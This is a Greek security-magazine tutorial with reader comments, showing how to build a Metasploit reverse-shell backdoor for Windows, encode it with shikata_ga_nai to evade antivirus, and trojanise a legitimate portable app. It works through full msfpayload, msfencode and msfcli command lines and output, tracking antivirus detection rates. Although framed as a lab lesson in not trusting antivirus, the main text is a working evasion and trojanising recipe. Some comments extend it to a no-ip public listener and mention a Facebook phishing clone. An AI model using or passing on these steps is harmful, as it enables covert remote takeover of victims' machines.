Σύστημα Windows χωρίς antivirus φωνάζει ότι ο κάτοχός του ζητάει αφορμές για μπελάδες κι επεισόδια! Αλλά μη νομίζετε, η πρώτη άμυνα κατά του malware *δεν* είναι το όποιο antivirus…
Ακόμα κι ένα διαρκώς ενημερωμένο antivirus που ταυτόχρονα διαθέτει άριστα heuristics και δυνατότητες sandboxing, είναι ανήμπορο να προστατεύσει τον ιδιοκτήτη του από την ίδια του την αφέλεια. Γι’ αυτό και δεν χάνουμε ευκαιρία να επαναλαμβάνουμε ότι πρώτη γραμμή άμυνας είναι η συμπεριφορά μας, όχι το όποιο software προστασίας -καλώς- χρησιμοποιούμε.
Επειδή όμως οι γενικές συμβουλές δεν έχουν την ίδια αξία με τα πρακτικά παραδείγματα, στο παρόν άρθρο θα δούμε τι μπορεί να συμβεί αν δεν είμαστε σώφρονες κι εγκαθιστούμε ό,τι μας κατέβει, μένοντας εφησυχασμένοι στη σκέψη ότι έχουμε ενεργοποιημένο antivirus, το οποίο, παρεμπιπτόντως, είναι και πλήρως ενημερωμένο με τα πλέον πρόσφατα virus definitions.
Για τη συνέχεια θα δουλέψουμε με το Metasploit μέσα από ένα BackTrack VM. Για τις ανάγκες της επίδειξής μας θα χρησιμοποιήσουμε κι ένα Windows 7 Ultimate 32bit VM. Πιο συγκεκριμένα, αρχικός μας στόχος στο παρόν άρθρο είναι να φτιάξουμε ένα backdoor, το οποίο όταν τρέχει σε κάποιο Windows host θα δίνει στον επιτιθέμενο πλήρη πρόσβαση στο σύστημα. Αλλά δεν θα περιοριστούμε σ’ αυτό. Το backdoor θα το κωδικοποιήσουμε ώστε ναι μεν να εξακολουθεί να ‘ναι εκτελέσιμο και να κάνει τη δουλειά του, αλλά να ‘ναι κι εξαιρετικά δύσκολο να εντοπιστεί από αρκετά antivirus! Και σαν να μην έφτανε αυτό, θα δείξουμε πώς είναι δυνατόν το backdoor να ενσωματωθεί μέσα σ’ ένα άλλο, εντελώς αθώο πρόγραμμα. Φυσικά, η ενεργοποίηση του αθώου προγράμματος θα συνεπάγεται και την ταυτόχρονη ενεργοποίηση του backdoor. Και κάπου εδώ νομίζουμε ότι έχουμε την προσοχή σας, οπότε μπορούμε να περάσουμε στη δράση ;)
Δημιουργία backdoor
Δουλεύουμε με το εργαλείο του Metasploit ονόματι msfpayload, χάρη στο οποίο μπορούμε να δημιουργούμε εκτελέσιμα ξεκινώντας από payloads του Metasploit. Εμείς τώρα θέλουμε να φτιάξουμε ένα executable, το οποίο όταν εκτελείται στο μηχάνημα του θύματος θα παρέχει στον attacker ένα πλήρες shell προς αυτό. Για το σκοπό μας επιλέγουμε το Windows Reverse TCP payload.
Το Metasploit υποστηρίζει τριών ειδών payload: τα singles, τα stagers και τα stages. Τα singles περιλαμβάνουν όλον τον κώδικα που χρειάζονται προκειμένου να κάνουν τη δουλειά τους. Τα δε stagers έχουν ελάχιστο κώδικα, ακριβώς όσον απαιτείται για ν’ ανοίξουν μια σύνδεση προς το box του attacker. Απ’ αυτό φορτώνουν στη μνήμη του victim box τον υπόλοιπο κώδικα που χρειάζονται για ό,τι άλλο υποτίθεται ότι κάνουν, όπως, π.χ., παροχή command shell. Τέλος, τα stages είναι ο κώδικας που φορτώνουν τα stagers *αφού* ανοίξουν μια σύνδεση προς το box του attacker.
Για το backdoor που θέλουμε να φτιάξουμε υπάρχει εκδοχή single και stager. Ας δούμε τι γίνεται με την πρώτη. Σε μια κονσόλα του BackTrack πληκτρολογούμε:
root@bt:~# msfpayload windows/shell_reverse_tcp O Name: Windows Command Shell, Reverse TCP Inline Module: payload/windows/shell_reverse_tcp Version: 8642 Platform: Windows Arch: x86 Needs Admin: No Total size: 314 Rank: Normal Provided by: vlad902 <vlad902@gmail.com> sf <stephen_fewer@harmonysecurity.com> Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, none, process LHOST yes The listen address LPORT 4444 yes The listen port Description: Connect back to attacker and spawn a command shell
Δίνοντας στο msfpayload το όνομα του payload μαζί με την οδηγία (O)ptions, παίρνουμε πληροφορίες για το exploit. Μεταξύ άλλων βλέπουμε το μέγεθός του σε bytes (314), καθώς και τις παραμέτρους που δέχεται. Προφανώς, από αυτές εμείς πρέπει να καθορίσουμε την LHOST – συγκεκριμένα να της δώσουμε το IP του box μας (εμάς ήταν το 192.168.117.130). Ας δημιουργήσουμε λοιπόν το εκτελέσιμο:
root@bt:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.117.130 X > ~/backdoor.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/shell_reverse_tcp Length: 314 Options: LHOST=192.168.117.130
Παρατηρήστε ότι αυτή τη φορά δώσαμε στο msfpayload την οδηγία e(X)ecutable. Χάρη και στον τελεστή ανακατεύθυνσης ‘>’, στο home directory του root πήραμε το εκτελέσιμο με όνομα backdoor.exe. Ας το ανεβάσουμε γρήγορα γρήγορα στην υπηρεσία novirusthanks, να δούμε πόσα και ποια antivirus το εντοπίζουν! Διαπιστώνουμε ότι 8 από τα 16 antivirus που γνωρίζει το novirusthanks μαρκάρουν το backdoor.exe ως malware, μεταξύ αυτών και τα Avast! κι AVG, δύο από τα δημοφιλέστερα δωρεάν antivirus.
Ας δούμε τι γίνεται αν ανεβάσουμε το ίδιο backdoor που τώρα όμως έχει παραχθεί από την εκδοχή stager του payload:
root@bt:~# msfpayload windows/shell/reverse_tcp O Name: Windows Command Shell, Reverse TCP Stager Module: payload/windows/shell/reverse_tcp Version: 10394, 11421 Platform: Windows Arch: x86 Needs Admin: No Total size: 290 Rank: Normal Provided by: spoonm <spoonm@no$email.com> sf <stephen_fewer@harmonysecurity.com> hdm <hdm@metasploit.com> skape <mmiller@hick.org> Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, none, process LHOST yes The listen address LPORT 4444 yes The listen port Description: Connect back to the attacker, Spawn a piped command shell (staged)
Παρατηρήστε ότι το όνομα του payload μετά το “shell” έχει slash αντί για underscore. Αυτή είναι και η μοναδική διαφοροποίηση στην ονομασία των δύο εκδοχών. Από κει και πέρα υπάρχει και η ουσιαστική διαφορά του μεγέθους: Η staged εκδοχή είναι μικρότερη από την single, για την ακρίβεια είναι 290 αντί για 314 bytes. Από τη στιγμή που τα antivirus engines δουλεύουν *και* με βάση τα signatures, αυτά τα 24 bytes είναι πιθανό να κάνουν τη διαφορά. Περιμένουμε, δηλαδή, ότι όσο μικρότερο είν’ ένα αρχείο τόσο πιο δύσκολο θα ‘ναι να μαρκαριστεί ως κακόβουλο. Για να δούμε, επαληθεύεται η θεωρία από την πράξη; Φτιάχνουμε το backdoor μας δίνοντας
root@bt:~# msfpayload windows/shell/reverse_tcp LHOST=192.168.117.130 X > ~/backdoor-stager.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/shell/reverse_tcp Length: 290 Options: LHOST=192.168.117.130
κι αμέσως μετά ανεβάζουμε το αρχείο backdoor-stager.exe στο novirusthanks. Διαπιστώνουμε ότι αυτή τη φορά 11 από τα 16 antivirus το μαρκάρουν ως malware! Συμπέρασμα: Η θεωρία μας δεν επαληθεύεται στην πράξη – τουλάχιστον όχι για το συγκεκριμένο backdoor. Είναι προφανές ότι πρέπει ν’ αλλάξουμε στρατηγική.
Κωδικοποίηση backdoor
Ένα εξαιρετικά χρήσιμο εργαλείο που υπάρχει στην εργαλειοθήκη του Metasploit είναι το msfencode. Δουλειά του είναι να παίρνει ένα αρχείο και να παράγει ένα άλλο, το οποίο αποτελεί μια κωδικοποιημένη εκδοχή του αρχικού. Την ίδια την κωδικοποίηση, μ’ άλλα λόγια τον αλγόριθμο μετασχηματισμού, τον επιλέγει ο χρήστης από ένα σύνολο διαθέσιμων. Για να τους δούμε όλους αρκεί να δώσουμε
root@bt:~# msfencode -l Framework Encoders ================== Name Rank Description ---- ---- ----------- cmd/generic_sh good Generic Shell Variable Substitution Command Encoder cmd/ifs low Generic ${IFS} Substitution Command Encoder cmd/printf_php_mq good printf(1) via PHP magic_quotes Utility Command Encoder generic/none normal The "none" Encoder mipsbe/longxor normal XOR Encoder mipsle/longxor normal XOR Encoder php/base64 great PHP Base64 encoder ppc/longxor normal PPC LongXOR Encoder ppc/longxor_tag normal PPC LongXOR Encoder sparc/longxor_tag normal SPARC DWORD XOR Encoder x64/xor normal XOR Encoder x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder x86/avoid_utf8_tolower manual Avoid UTF8/tolower x86/call4_dword_xor normal Call+4 Dword XOR Encoder x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder x86/context_stat manual stat(2)-based Context Keyed Payload Encoder x86/context_time manual time(2)-based Context Keyed Payload Encoder x86/countdown normal Single-byte XOR Countdown Encoder x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder x86/nonalpha low Non-Alpha Encoder x86/nonupper low Non-Upper Encoder x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder x86/single_static_bit manual Single Static Bit x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
Όπως φαίνεται κι από τη στήλη Rank, ο καλύτερος αλγόριθμος κωδικοποίησης είναι ο “shikata ga nai” (“τίποτε δεν μπορεί να γίνει γι’ αυτό”, στα Ιαπωνικά). Θα τον εφαρμόσουμε λοιπόν στην έξοδο του msfpayload, με στόχο να πάρουμε ένα αποτέλεσμα που δεν θα ‘ναι εύκολα αναγνωρίσιμο από τα antivirus engines. Πρώτα όμως πρέπει να πάρουμε το payload σε μορφή (R)aw, αφού σε τέτοια θα το περιμένει το msfencode. Δεν υπάρχει πρόβλημα – αρκεί να δώσουμε στο msfpayload την κατάλληλη οδηγία:
root@bt:~# msfpayload windows/shell/reverse_tcp LHOST=192.168.117.130 R > ~/backdoor.raw root@bt:~# ls -lh backdoor.raw -rw-r--r-- 1 root root 290 Feb 20 16:57 backdoor.raw root@bt:~# file backdoor.raw backdoor.raw: data
Πάνω στο αρχείο backdoor.raw εφαρμόζουμε τον shikata ga nai και στην έξοδό του παίρνουμε ένα κωδικοποιημένο εκτελέσιμο:
root@bt:~# cat backdoor.raw | msfencode -e x86/shikata_ga_nai -t exe > ~/backdoor.exe [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
Σημειώστε ότι ο συγκεκριμένος αλγόριθμος είναι δυνατόν να εφαρμοστεί περισσότερες από μία φορές πάνω στο ίδιο σύνολο δεδομένων, “ανακατώνοντάς” το περαιτέρω σε κάθε πέρασμα ή επανάληψη (iteration). Μη βιαστείτε όμως να συσχετίσετε τον αριθμό των επαναλήψεων με την ανιχνευσιμότητα του backdoor μας από τα antivirus engines. Όμως κάθε πράγμα στην ώρα του. Προς το παρόν, ας ανεβάσουμε το νέο, κωδικοποιημένο κατά shikata ga nai εκτελέσιμο στο novirusthanks. Όπως βλέπουμε, αυτή τη φορά το αναγνωρίζουν 7 στα 16 antivirus, με το Avast! να μη συγκαταλέγεται σ’ αυτά. Καλό αυτό. Ας δοκιμάσουμε τώρα να εφαρμόσουμε τον αλγόριθμο δύο φορές (βλ. παράμετρο -c):
root@bt:~# cat backdoor.raw | msfencode -e x86/shikata_ga_nai -c 2 -t exe > ~/backdoor.exe [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
Ανεβάζοντας ξανά το backdoor.exe στο novirusthanks, διαπιστώνουμε ότι τώρα μόλις 6 στα 16 antivirus το αναγνωρίζουν, με τα δύο δημοφιλέστερα δωρεάν, το Avast! και το AVG, να μη συγκαταλέγονται σ’ αυτά! Στο σημείο αυτό η όρεξη ανοίγει και είναι λογικό να δοκιμάσουμε τον shikata ga nai με περισσότερες επαναλήψεις. Όπως όμως μπορείτε να δείτε κι εσείς, από ένα σημείο και μετά οι επαναλήψεις δεν έχουν νόημα. Για παράδειγμα, με 4 επαναλήψεις επιστρέφουμε στα 7 από τα 16 antivirus, ενώ με 8 επαναλήψεις στα 6 από τα 16. Φαίνεται, μ’ άλλα λόγια, ότι από ένα σημείο και μετά ο αλγόριθμος ταλαντώνεται ή αλλιώς επαναλαμβάνεται χωρίς ν’ αυξάνει την εντροπία, για να χρησιμοποιήσουμε κι έναν όρο από τη φυσική. Αλλά δεν πρέπει να είμαστε αχάριστοι: Χρησιμοποιώντας δωρεάν εργαλεία και χωρίς να κοπιάσουμε ή να σπαζοκεφαλιάσουμε, καταφέραμε και δημιουργήσαμε ένα backdoor το οποίο είναι αόρατο για δύο από τα δημοφιλέστερα δωρεάν antivirus, καθώς κι από ορισμένα εμπορικά (βλ., π.χ., έκδοση 4.2.42.0 του NOD32 και 9.120-1004 του TrendMicro).
Καμουφλάρισμα!
Το msfencoder υποστηρίζει την ενσωμάτωση ενός payload μέσα σ’ ένα άλλο εκτελέσιμο, δυσχεραίνοντας έτσι σημαντικά την ανίχνευση του κακόβουλου κώδικα. Όσο για το υποψήφιο θύμα, τα πράγματα είναι ακόμα πιο ζοφερά. Πλέον, όχι μόνο δεν παίρνει κάποια προειδοποίηση από το antivirus, αλλά τρέχει μια γνωστή, καθωσπρέπει εφαρμογή. Την ίδια στιγμή, φυσικά, σιωπηρά εκτελείται και το backdoor :S
Για να δοκιμάσουμε αυτή τη δυνατότητα του msfpayload, σ’ ένα Windows VM κατεβάσαμε την εκδοχή portable του SpyDLLRemover από το
http://portableapps.com/apps/utilities/spydllremover_portable
Την εγκαταστήσαμε στο δικό της φάκελο -μην ξεχνάτε ότι πρόκειται για portable app- και από τον υποφάκελο App/SpyDLLRemover πήραμε το εκτελέσιμο SpyDLLRemover.exe και το μεταφέραμε στο BackTrack VM. Εκεί, έχοντας έτοιμη την εκδοχή raw του Windows Reverse TCP payload (single), πληκτρολογήσαμε:
root@bt:~# cat backdoor.raw | msfencode -e x86/shikata_ga_nai -c 8 -k -x ~/SpyDLLRemover.exe -t exe > ~/SDLLR.exe
Ανεβάζοντας το SDLLR.exe στο novirusthanks διαπιστώσαμε ότι μόλις 4 από τα 16 antivirus engines το χαρακτήρισαν ως malware. Εντύπωση μας έκανε το γεγονός ότι από τα δωρεάν, γνωστά antivirus, το Avast! κατάφερε να το εντοπίσει αλλά όχι το AVG. Στη συνέχεια μετονομάσαμε το SDLLR.exe σε SpyDLLRemover.exe κι αντικαταστήσαμε το πρωτότυπο. Πριν εκτελέσουμε την εφαρμογή σε περιβάλλον Windows 7, στο BackTrack σηκώσαμε τον κατάλληλο listener:
root@bt:~# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=192.168.117.130 E
Αμέσως μετά τρέξαμε το SpyDLLRemover στο Windows 7 VM. Η εφαρμογή ξεκίνησε ωραιότατα, το ίδιο και το backdoor (βλ. εικόνα 7).
Συμπεράσματα
Πολύ απλά, όποιο antivirus κι αν έχουμε δεν το εμπιστευόμαστε στα τυφλά. Επίσης: Ακόμα κι αν πρόκειται να εγκαταστήσουμε μια γνωστή εφαρμογή, αν δεν την έχουμε πάρει από μια επίσημη, έμπιστη πηγή δεν δικαιούμαστε να πιστεύουμε ότι είναι “καθαρή” από malware. Τέλος, τις περιπτώσεις που σώνει και καλά θέλουμε να κατεβάσουμε και να εκτελέσουμε ένα ύποπτο πρόγραμμα, καλό είναι να το κάνουμε μέσα από VM το οποίο *δεν* επικοινωνεί με το host OS. Για την ακρίβεια πρώτα παίρνουμε snapshot του VM, στη συνέχεια κάνουμε μέσα σ’ αυτό ό,τι είναι να κάνουμε και τέλος επαναφέρουμε το snapshot, εξαφανίζοντας ό,τι είναι πιθανό ν’ άφησε πίσω του το όποιο malware.
32 Responses to “Προσπέρασμα Antivirus και συνέπειες”
Comment Link
Xμμμ…..
Θεωρούσα το ESET ως το top antivirus…. πολύ περίεργο!
Βέβαια στο άρθρο βλέπω το NOD32 και όχι το Smart Security που έχω εγώ! Δεν ξέρω αν παίζει κι αυτό το ρόλο του! Λές να το γυρίσω σε BitDefender?
Comment Link
Όχι βέβαια, να μείνεις στο Smart Security. Το άρθρο δεν αποτελεί συγκριτικό AVs και σίγουρα δεν θα μπορούσε να βγει συμπέρασμα από ένα μόνο backdoor, που κατασκευάστηκε από το Metasploit. Είναι και το άλλο: Το άρθρο γράφτηκε τον Μάρτη του 2011. Αν ακολουθήσεις τα βήματα που περιγράφονται και κάνεις τις ίδιες δοκιμές με την υπηρεσία novirusthanks, θα πάρεις εντελώς διαφορετικά αποτελέσματα.
Για να συνοψίσω, να πω ξανά ότι το άρθρο δεν αποτελεί συγκριτικό AVs αλλά θέλει να δείξει πώς εργαζόμαστε για να φτιάξουμε ένα backdoor που είναι *πιθανό* να περάσει απαρατήρητο από *κάποια* AVs. Τελικός στόχος του άρθρου, φυσικά, είναι να δείξει ότι *δεν* πρέπει να εμπιστευόμαστε τυφλά το όποιο AV χρησιμοποιούμε αλλά να εφαρμόζουμε *και* κριτική σκέψη. Μόνο τότε έχουμε ουσιαστική ασφάλεια (που και πάλι δεν είναι στο 100% :D)
Comment Link
Ωραίο άρθρο. Τι γίνετε αν το περάσω 2 φορες από τον shikata ga nai και μετά άλλες 2 από έναν άλλο αλγόριθμο; Αυτό θα βοηθήσει στο να μην μας το μαρκάρουν ως malware;
Comment Link
Όχι απαραίτητα (το έχω δοκιμάσει κι εγώ :D)
Αν πάντως δοκιμάσεις και βρεις κάποιον ενδιαφέροντα συνδυασμό, please, feel free to share!
Comment Link
Giati mou emfanizei synexws ayto…??
[*] Command shell session 1 closed. Reason: Died from Errno::ECONNRESET
ti ftaiei??
Comment Link
Greeklish εδώ;! (Δις)
Μα καλά, δεν μπήκες καν στον κόπο να διαβάσεις τους εξαιρετικά απλούς, σύντομους και 1000% τίμιους κανόνες δημοσίευσης; (http://deltahacker.gr/forum-rules)
Μας ραγίζεις την καρδιά, να το ξέρεις :(
Comment Link
Συγγνωμη για το ατοπημα….αλλα ειχα μπει απο λαιβ backtrack και δεν εγραφε ελληνικα…καμια ιδεα ρε παιδια για το προβλημα…??
Comment Link
Με λίγα λόγια, η σύνδεση με τον απομακρυσμένο host διακόπτεται.
Θέλεις να μας πεις λίγα περισσότερα για το setup σου; Δουλεύεις σε εικονικό LAN, με VMs; Μήπως σε αληθινό LAN, με αληθινούς υπολογιστές; (Στοιχηματίζω το δεύτερο.)
Κι ένα τελευταίο: Ο υπολογιστής-στόχος από ποιον ελέγχεται;
Comment Link
Και τα 2 pc βρισκονται σπιτι μου.Το ενα που κανει την επιθεση τρεει backtrack 5 kai το αλλο windows 7 .ακουστε τι θελω να κανω.την μια φορα να περασει το backdoor kai apo antivirus και να εκτελεστει κανονικα και μια δευτερη φορα να διακοψω την επιθεση με το snort.Αυτο ειναι ολο.Ακομη προσπαθησα το backdoor me to vnc_dll και παλι μου λεει οτι ο vnc server δεν βρισκεται στο path…..
Comment Link
Αυτο μου βγαζει για το vnc dll ….
[-] Failed to launch vncviewer. Is it installed and in your path?
Τι πρεπει να κανω ρε παιδια….???Ειμαι απελπισμενοςςς….:((:(((
Comment Link
Το ελυσα το προβλημα τελικα απλα ηθελα να εγκαταστησω μερικα πακετα παραπανω……….Παντως περα απο την πλακα ειναι πολυ κριμα που το forum ειναι ετσι “ψοφιο”,το λεω παντα με φιλικη διαθεση….!!!
Comment Link
Τι έφταιγε, τελικά; (Το forum θα ζωηρέψει, απλά χρειάζεται λίγο καιρό ακόμα :D)
Comment Link
Νομιζει οτι κατι τετοιο δεν θα γινει ποτε διοτι χρησιμοποιειτε πολυ το fb και το tweet ,ενω αν ολοι εμπαιναν στο σαιτ για να δουν νεα ανακοινωσεις θα ηταν αλλιως τα πραγματα….!!
Comment Link
Κοίτα, καταλαβαίνω τι λες, σήμερα όμως είναι απλά αδύνατον να *μην* χρησιμοποιείς το Facebook και το Twitter. Η κίνηση όμως θα αυξηθεί και εδώ — και θ’ αυξηθεί λόγω του υλικού που θ’ αρχίσουμε ν’ ανεβάζουμε σύντομα ;)
Comment Link
οκ τοτε παω πασο….ααα και δεν χρησιμοποιω κανενα απο τα “κοινωνικα δικτυα”……::)))
Comment Link
Ρε παιδια εχω το εξης προβλημα…δοκιμαζω exploit σε καποιο win-box με meterpreter payload αλλα συνεχως μου εμφανιζει lang:Unknown. το βοχ εχει ελληνικα,χτες το αλλαξα σε αγγλικα αλλα παλι τπτ .μου εμφανιζει οτι δεν βρσκει τη γλωσσα και δεν μπορει να κανει συνδεση …..καμια ιδεα για λυση…??
Comment Link
Kανεις δεν ξερει….???
Comment Link
Μήπως ξέρει κανείς, τι ακριβώς κάνει το “Apache httpd Web Server Range Header Denial of Service Vulnerability”
http://www.exploit-db.com/exploits/17696
βρέθηκα ξαφνικά με το 80 port ανοιχτό στο backtrack.
αναφορά από openvas-security
Ευχαριστώ
Comment Link
Μαγκες σορρυ που ειμαι λιγο νοομπ …οταν παταω …
msfpayload windows/shell_reverse_tcp O
μου λεει ..Invalid Payload: windows/shell_reverse_tcp Γιατι ??
Comment Link
Προφανώς γιατί δεν υπάρχει αυτό το path… (είναι /shell/reverse_tcp). Δοκίμασε γενικά και την εντολή
(θα αργήσει να εκτελεστεί) για να δεις μια λίστα με όλα τα διαθέσιμα payloads. Παρεπιπτόντως, έχει βγει πλέον το εργαλείο
που έχει αντικαταστήσει τα msfpayload και msfencode. Δες και εδώ: http://www.phillips321.co.uk/2011/07/07/metasploits-msfvenon-command-line-utility/
Comment Link
Οταν πατάω msfpayload -l το έχει στη λίστα ..!!
Μήπος φταίει που έχω framework2 ?? το 3 γινετε να το βάλω ?
Δουλέυω ΒΤ5kdeR2 σε VMBox ! Πειράζει που δεν το έχω κάνει install ??
Οσο για το msfvenom φαίνετε πολύ κομπλέ !! Έφτιαξα ένα payload.exe στο μπάμ οπως λέει στο λινκ .. αλλά δεν μπορώ να το στείλω στα windows..το
samba δεν μπορεί να το κλικάρει.
Μια που άρχισα να κάνω ερωτήσεις ..(σορρυκιολας)
Τις προάλλες που έκανα SiteClone + Spoof το fb όλα γίναν κομπλέ ..Μόλις όμως έμπαινα σαν θύμα απο τα windows(vista) έκανε σαν τρέλο και στο BT μου έλεγε συνέχεια code 404 message file not found !! Τι παίζει ??
Comment Link
Παίζει να είμαι και ο πιο άσχετος. Αλλά μία ερώτηση. Γιατί για παραπάνω δεν με παίρνει. Τι γλώσσα προγραμματισμού χρησιμοποιείται ή είναι πάνω από μία και ποιες ;; :D
Comment Link
Φαντάζομαι ότι αναφέρεσαι στο payload, αυτό δηλαδή που *δεν* θέλουμε να αναγνωρίζεται από τα antivirus. Αυτό το payload, λοιπόν, στο συγκεκριμένο άρθρο δεν το γράφουμε σε κάποια γλώσσα προγραμματισμού αλλά για να το δημιουργήσουμε χρησιμοποιούμε τα εργαλεία του Metasploit Framework.
Αν δεν βοήθησα, γίνε σε παρακαλώ λίγο πιο συγκεκριμένος… :)
Comment Link
Εννοώ ότι στο όλο θέμα για να καταλήξεις εκεί που θέλεις και σε όλα τα βήματα άμα χρησιμοποιήθηκε κάποια γλώσσα προγραμματισμού :D ή είναι όπως είπες όλα εργαλεία ;; :)
Comment Link
Είναι εργαλεία, όπως φαίνεται κι από την ανάγνωση του άρθρου. Να προσθέσω εδώ ότι περισσότερα για το Metasploit Framework μπορείς να διαβάσεις και στα σχετικά άρθρα του τεύχους 017 (http://deltahacker.gr/?p=8058) και συγκεκριμένα στα
http://deltahacker.gr/?p=8083 και http://deltahacker.gr/?p=8087
Comment Link
Ευχαριστώ πολύ :D
Comment Link
μήπως ξέρει κάποιος πως να εκτελέσω αυτό το αρχείο(backdoor) από το pc με τα windows?
Comment Link
το δοκιμάζω σε 64bit και δεν δουλεύει γτ?
Comment Link
και πρέπει να αλλάξω για να πάω σε 64bit?
Comment Link
γεια και χαρα
δεν ξερω αν ειναι το σωστο post για να κανω την ερωτηση μου μιας και υπαρχουν πολλα σχετικα αρθρα για την παραμετροποιηση του payload.
η ερωτηση ειναι η εξης:
μπορω να βαλω τιμη στο lhost, hostname απο την υπηρεσια noip;
Comment Link
Μπορείς, ναι. Φρόντισε όμως ώστε ο host (με το Metasploit) είτε να είναι στο DMZ του router είτε να υπάρχει ο κατάλληλος κανόνας port forwarding στον router.
Κάνε τις δοκιμές σου και μην ξεχάσεις να μας μεταφέρεις τις εντυπώσεις σου, please.
Comment Link
ενταξει,δουλευει.
και το DMZ ανοιξε την πορτα και η υπηρεσια του noip δουλεψε.
μην ξεχναμε μονο να κανουμε εγκατασταση τον client του noip για να συγχρονιστει με την ip μας.
αυτο που δεν καταφερα να κανω ειναι να κρατησω ανοιχτο το session του meterpreter.
μηπως θα μπορουσε καποιος να μου δωσει καποια συμβουλη.
ευχαριστω.!